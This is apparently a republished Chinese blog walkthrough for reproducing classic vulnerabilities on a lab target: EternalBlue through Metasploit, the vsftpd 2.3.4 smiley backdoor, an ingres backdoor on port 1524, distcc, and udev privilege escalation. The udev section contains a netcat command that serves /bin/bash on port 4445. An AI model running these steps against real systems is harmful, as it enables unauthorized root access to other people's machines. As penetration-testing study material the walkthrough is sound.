漏洞復現
目錄
1. 永恒之藍(445埠)
2. 手動微笑漏洞(21埠 vsftpd2.3.4版本)
3. ingres資料庫DBMS后門(1524埠)
4. distcc漏洞(3632)
5. udev提權
1. 永恒之藍(445埠)
首先先搜索ms17_010

use 2 選擇編號二的

查看需要的引數

設定目標ip地址
![]()
run 啟動攻擊成功

2. 手動微笑漏洞(21埠 vsftpd2.3.4版本)
掃描到對方打開21號埠并且版本為vsftpd 2.3.4的

ftp跟上目標機的ip地址,帳號為root:) 密碼為root , 他就會停在那邊
(或者search vsftpd直接利用漏洞)

重新開個終端用nc連接該ip地址的6200埠(成功連接,并且是root權限)

3. ingres資料庫DBMS后門(1524埠)
掃描埠發現有1524埠的開放

直接telnet進行連接該ip的1524埠(直接獲得root用戶權限)

4. distcc漏洞(3632)
msf搜索distcc,并進入該模塊

查看所要引數,并設定目標ip

啟用失敗(跟環境有關,靶機需要開啟3632埠)

5. udev提權
searchsploit udev + locate 搜索加定位

進入shell
cat /proc/net/netlink -->記錄udev pid

切換到/tmp檔案下

touch run
echo '#!/bin/bash'> run
echo '/bin/netcat -Ivvp 4445 -e /bin/bash' >> run

將檔案移動到/var/www/html檔案夾下

下載并且編譯gcc udev.c -0 udev

./udev pid

連接成功

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/215403.html
標籤:其他
